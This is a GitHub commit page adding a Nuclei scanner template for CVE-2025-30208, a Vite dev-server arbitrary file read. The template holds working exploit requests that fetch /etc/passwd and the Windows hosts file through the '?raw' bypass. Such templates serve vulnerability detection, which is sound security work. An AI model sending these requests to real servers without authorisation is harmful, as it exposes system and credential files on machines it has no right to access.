Skip to content

Commit e3cb2cf

Browse files
Merge pull request #11828 from v2htw/CVE-2025-30208
Added CVE-2025-30208 Template
2 parents bb717e7 + a7986bb commit e3cb2cf

File tree

1 file changed

+53
-0
lines changed

1 file changed

+53
-0
lines changed

http/cves/2025/CVE-2025-30208.yaml

Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
id: CVE-2025-30208
2+
3+
info:
4+
name: Vite - Arbitrary File Read
5+
author: v2htw
6+
severity: medium
7+
description: |
8+
Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
9+
reference:
10+
- https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
11+
- https://nvd.nist.gov/vuln/detail/CVE-2025-30208
12+
classification:
13+
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
14+
cvss-score: 5.3
15+
cve-id: CVE-2025-30208
16+
cwe-id: CWE-284
17+
metadata:
18+
verified: true
19+
max-request: 1
20+
fofa-query: 'body="/@vite/client"'
21+
tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208
22+
23+
flow: http(1) && http(2)
24+
25+
http:
26+
- method: GET
27+
path:
28+
- "{{BaseURL}}"
29+
30+
matchers:
31+
- type: word
32+
part: body
33+
words:
34+
- "vite"
35+
internal: true
36+
37+
- method: GET
38+
path:
39+
- "{{BaseURL}}/etc/passwd?raw"
40+
- "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"
41+
42+
stop-at-first-match: true
43+
matchers-condition: and
44+
matchers:
45+
- type: regex
46+
regex:
47+
- "root:.*:0:0:"
48+
- "Microsoft Corp"
49+
condition: or
50+
51+
- type: status
52+
status:
53+
- 200

0 commit comments

Comments
 (0)